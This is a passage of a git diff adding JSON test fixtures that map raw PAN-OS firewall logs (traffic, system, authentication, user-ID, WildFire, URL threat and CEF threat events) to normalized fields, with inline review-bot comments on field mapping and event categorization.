null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": 
\"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187100,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17634,\"SessionStartTime\": \"2023-02-03T16:45:44.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:45:52.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.582000Z\",\"TimeReceived\": \"2023-02-03T16:45:56.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 0, + "outcome": "success", + "start": "2023-02-03T16:45:44Z", + "type": [ + "end" + ] + }, + "@timestamp": 
"2023-02-03T16:45:52Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "end" + }, + "destination": { + "address": "5.6.7.8", + "geo": { + "country_iso_code": "US" + }, + "ip": "5.6.7.8", + "nat": { + "port": 0 + }, + "port": 443 + }, + "log": { + "hostname": "PA-VM", + "logger": "traffic" + }, + "network": { + "application": "incomplete", + "bytes": 74, + "packets": 1 + }, + "observer": { + "egress": { + "interface": { + "alias": "untrusted" + } + }, + "ingress": { + "interface": { + "alias": "untrusted" + } + }, + "name": "PA-VM", + "product": "PAN-OS", + "serial_number": "007954000351998" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "end", + "URLCategory": "any", + "VirtualLocation": "vsys1" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "name": "intrazone-default", + "uuid": "f903db52-4b89-4610-b908-67be412704f0" + }, + "source": { + "address": "1.2.3.4", + "bytes": 74, + "ip": "1.2.3.4", + "port": 59087 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json new file mode 100644 index 000000000..2f58900ab --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json 
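Review bot: The expected `event.duration` of 0 in the test_traffic_event_2 fixture cannot tell whether the parser converts PAN-OS `SessionDuration` (seconds) into ECS `event.duration` (nanoseconds), because 0 reads the same in both units; a second fixture with a non-zero duration, for example a constructed input `\"SessionDuration\": 12` expecting `"duration": 12000000000`, would pin the conversion. The same fixture also pins `destination.nat.port: 0` while `NATDestination` is empty, and the zero placeholders recur as `source.port`/`destination.port: 0` in test_userid.json and as `0.0.0.0` NAT addresses in threat-url-xff.json (where `0.0.0.0` is also added to `related.ip`); locking those in as real values makes it harder to have the parser drop them later. Every new fixture in this commit also ends without a trailing newline.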
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:50:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:50:14.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content update job succeeded for user admin\",\"SequenceNo\":7200776623254143155,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:50:14.343000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:50:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:50:14.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content update job succeeded for user admin\",\"SequenceNo\":7200776623254143155,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:50:14.343000Z\"}\n", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "reason": "Content update job succeeded for user admin", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:50:14Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + }, + "related": { + 
"user": [ + "admin" + ] + }, + "user": { + "name": "admin" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json new file mode 100644 index 000000000..9a1d42f34 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json 
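Review bot: The system-log fixtures pin the firewall identity under `host.name` (from `LogSourceName`) with only `observer.product` filled, whereas the traffic fixtures place the same device under `observer.name`, `log.hostname` and `observer.serial_number` (from `DeviceName`/`DeviceSN`); `LogSourceID` `007954000351998` is that same serial but is not mapped here. This applies equally to test_upgrade_package_json.json, test_user_authentication_json.json, test_web_authentication_json.json and test_wildfire_failure_json.json. If the firewall is the observer for traffic events it presumably should be the observer for its own system events too, e.g. expecting `"observer": {"name": "PA-VM", "product": "PAN-OS", "serial_number": "007954000351998"}` and keeping `host.name` only if the producing host is meant to be distinct.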
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:49:49.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:49:34.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content package upgraded from version 8671-7826 to 8676-7858 by admin\",\"SequenceNo\":7200776623254143153,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:49:34.604000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:49:49.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:49:34.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content package upgraded from version 8671-7826 to 8676-7858 by admin\",\"SequenceNo\":7200776623254143153,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:49:34.604000Z\"}\n", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "reason": "Content package upgraded from version 8671-7826 to 8676-7858 by admin", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:49:34Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + 
"DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + }, + "related": { + "user": [ + "admin" + ] + }, + "user": { + "name": "admin" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json new file mode 100644 index 000000000..ea53d3353 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json @@ -0,0 +1,54 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"auth\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":null,\"EventName\":\"auth-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"authenticated for user 'admin'. From: 1.2.3.4.\",\"SequenceNo\":7200776623254143115,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.813000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"auth\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":null,\"EventName\":\"auth-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"authenticated for user 'admin'. 
From: 1.2.3.4.\",\"SequenceNo\":7200776623254143115,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.813000Z\"}\n", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "authenticated for user 'admin'. From: 1.2.3.4.", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:41:18Z", + "action": { + "type": "auth" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "auth" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "admin" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "admin" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json new file mode 100644 index 000000000..dee27d0e1 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json 
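Review bot: The expected output for `EventName: auth-success` carries `event.category: authentication` but no `event.outcome`, so the fixture pins an authentication event whose success or failure is only recoverable from the free-text `event.reason`; detection logic keyed on `event.outcome` cannot distinguish this from a failed logon. The expected `event` object should include `"outcome": "success"`, and a counterpart fixture for an authentication failure would be valuable. The same gap applies to test_wildfire_failure_json.json, where `EventName: wildfire-conn-failed` yields no `event.outcome: failure` either.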
@@ -0,0 +1,60 @@ +{ + "input": { + "message": "1,2024/01/12 11:23:33,01545100000000,USERID,login,2222,2024/01/12 11:23:33,vsys1,1.2.3.4,test.fr\\JDOE,,0,1,10888,0,0,vpn-client,globalprotect,555555555555555555555555,0x8000000000000000,0,0,0,0,,test-01,1,,2024/01/12 11:23:33,1,0x80000000,dtest,,2024-01-12T11:23:33.907+01:00" + }, + "expected": { + "message": "1,2024/01/12 11:23:33,01545100000000,USERID,login,2222,2024/01/12 11:23:33,vsys1,1.2.3.4,test.fr\\JDOE,,0,1,10888,0,0,vpn-client,globalprotect,555555555555555555555555,0x8000000000000000,0,0,0,0,,test-01,1,,2024/01/12 11:23:33,1,0x80000000,dtest,,2024-01-12T11:23:33.907+01:00", + "event": { + "category": [ + "authentication" + ], + "dataset": "userid", + "type": [ + "start" + ] + }, + "@timestamp": "2024-01-12T10:23:33.907000Z", + "action": { + "type": "login" + }, + "destination": { + "port": 0 + }, + "log": { + "hostname": "test-01", + "logger": "userid" + }, + "observer": { + "name": "test-01", + "product": "PAN-OS", + "serial_number": "01545100000000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "0", + "Threat_ContentType": "login", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "JDOE" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 0 + }, + "user": { + "domain": "test.fr", + "name": "JDOE" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json new file mode 100644 index 000000000..23d0aaaf8 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json 
@@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"User admin logged in via Web from 1.2.3.4 using https\",\"SequenceNo\":7200776623254143116,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.825000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"User admin logged in via Web from 1.2.3.4 using https\",\"SequenceNo\":7200776623254143116,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.825000Z\"}\n", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "reason": "User admin logged in via Web from 1.2.3.4 using https", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:41:18Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "network": { + "protocol": "https" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + 
"DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "admin" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "admin" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json new file mode 100644 index 000000000..c3b8bcffc --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json 
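Review bot: The expected output classifies "User admin logged in via Web from 1.2.3.4 using https" as `event.category: host` / `event.type: info`, while test_user_authentication_json.json classifies the equivalent `auth-success` event as `authentication`; a management-plane login is therefore invisible to any rule that filters on `event.category: authentication`. The categorization presumably follows `Subtype: general` rather than the description, yet the parser clearly recognizes the login since it extracts `user.name`, `source.ip` and `network.protocol` from it. Consider expecting `"category": ["authentication"]` with `"type": ["start"]` and `"outcome": "success"` here.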
@@ -0,0 +1,52 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T17:45:55.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:45:43.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-failed\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Failed to perform task resulting in connection timeout with WildFire Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143341,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:45:43.111000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T17:45:55.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:45:43.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-failed\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Failed to perform task resulting in connection timeout with WildFire Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143341,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:45:43.111000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "module": "WildFire", + "reason": "Failed to perform task resulting in connection timeout with WildFire Cloud wildfire.paloaltonetworks.com", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T17:45:43Z", + "action": { + "type": "fb" + }, + "destination": { + "address": "wildfire.paloaltonetworks.com", + "domain": "wildfire.paloaltonetworks.com", + 
"registered_domain": "paloaltonetworks.com", + "subdomain": "wildfire", + "top_level_domain": "com" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "fb" + }, + "related": { + "hosts": [ + "wildfire.paloaltonetworks.com" + ] + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json new file mode 100644 index 000000000..b6430085e --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json 
@@ -0,0 +1,109 @@ +{ + "input": { + "message": "1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,\"www.sekoia.io:443/catalog/integrations?query=this\",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 16),,\"11.22.33.44\",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"Sekoia,cybertech,low-risk\",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,,,NonProxyTraffic", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,\"www.sekoia.io:443/catalog/integrations?query=this\",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 
16),,\"11.22.33.44\",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"Sekoia,cybertech,low-risk\",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,,,NonProxyTraffic", + "event": { + "action": "alert", + "category": [ + "network" + ], + "code": "9999", + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-03-12T14:02:32.650000Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "192.168.0.1", + "domain": "www.sekoia.io", + "ip": "192.168.0.1", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 80 + }, + "http": { + "request": { + "method": "get" + } + }, + "log": { + "hostname": "FW", + "level": "informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing", + "forwarded_ip": "11.22.33.44", + "transport": "tcp" + }, + "observer": { + "name": "FW", + "product": "PAN-OS", + "serial_number": "016401004874" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url", + "VirtualLocation": "vsys", + "VirtualSystemName": "VSYS", + "threat": { + "id": "9999" + } + }, + "related": { + "hosts": [ + "www.sekoia.io" + ], + "ip": [ + "0.0.0.0", + "10.0.0.2", + "192.168.0.1" + ] + }, + "rule": { + "name": "rule-internet", + "uuid": "ea3431a2-6869-4d9f-ad41-1858d80b406c" + }, + "source": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 49802 + }, + "url": { + "domain": "www.sekoia.io", + "path": "catalog/integrations", + "port": 443, + "query": "query=this", + "registered_domain": "sekoia.io", + "subdomain": "www", + "top_level_domain": 
"io" + }, + "user_agent": { + "name": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json new file mode 100644 index 000000000..35786b908 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json 
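Review bot: `url.path` is pinned as `catalog/integrations` without the leading slash, and `user_agent.name` holds the whole header value `Mozilla/4.0 (compatible; ms-office; MSOffice 16)`; in ECS `url.path` is the path component (`/catalog/integrations`) and the raw header belongs in `user_agent.original`, with `user_agent.name` reserved for the parsed agent name. Neither `url.original` nor `url.full` is expected, so the source string `www.sekoia.io:443/catalog/integrations?query=this` is only recoverable from `message`.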
@@ -0,0 +1,128 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|spyware|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx start=Mar 01 2021 20:48:16 PanOSApplicationCategory=general-internet PanOSApplicationContainer=sina-weibo PanOSApplicationRisk=4 PanOSApplicationSubcategory=social-networking PanOSApplicationTechnology=browser-based PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSHTTPMethod=get PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=13884 PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSPayloadProtocolID=-1 PanOSSanctionedStateOfApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=paloaltonetwork suser=xxxxx suid= cat=27379 PanOSThreatNameFirewall=27379 PanOSTunneledApplication=tunneled-app PanOSURLDomain= PanOSUsers=paloaltonetwork\\\\xxxxx PanOSVerdict= PanOSVirtualSystemID=1 
c6a2=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a2Label=Source IPv6 Address c6a3=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a3Label=Destination IPv6 Address sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=deny-attackers cs1Label=Rule suser0=paloaltonetwork\\\\xxxxx duser0=paloaltonetwork\\\\xxxxx app=sina-weibo-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test4 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=947181 cn1Label=SessionID cnt=1 spt=13884 dpt=4228 sourceTranslatedPort=30116 destinationTranslatedPort=20966 proto=tcp act=drop-all request=some other fake filename PanOSThreatID=27379(27379) flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=LY PanOSDestinationLocation=BR fileId=0 PanOSFileHash= PanOSApplianceOrCloud= PanOSURLCounter=0 PanOSFileType= PanOSSenderEmail= PanOSEmailSubject= PanOSRecipientEmail= PanOSReportID=0 PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx 